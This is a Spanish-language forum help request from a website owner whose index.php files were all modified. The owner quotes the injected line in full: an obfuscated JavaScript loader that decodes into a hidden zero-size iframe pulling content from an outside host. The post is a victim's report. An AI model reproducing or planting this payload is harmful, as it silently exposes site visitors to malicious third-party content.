Hoy me he encontrado con todos los index.php de mi sitio web (está organizado con carpetas que contienen nuevos index.php, al estilo de un CSM) habían sido modificados añadiendo esta línea al final de todos y cada uno de ellos:
Código PHP:
<!-- ~ --><script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('*8Hnkwfrj*75xwh*8I*77myyu*8F44%7C%7C%7C3htssjhynslxqnhj3htr4hxx84ns3umu*8Kfi%7B*8I9*77*75%7Cniym*8I*775*77*75mjnlmy*8I*775*77*75kwfrjgtwijw*8I*775*77*75xhwtqqnsl*8I*77st*77*8J*8H4nkwfrj*8J5')</script><!-- ~ -->
Mi pregunta es, ¿Cómo han podido hacerlo? Tengo los permisos de las webs con 755 (Sólo escritura para propietario), así que se supone que sólo ha podido ser subiendo un script atacante? ¿Cómo puedo luchar contra ello?
¿Cómo puede conocer mi árbol de directorios?
Gracias de antemano por la ayuda :(
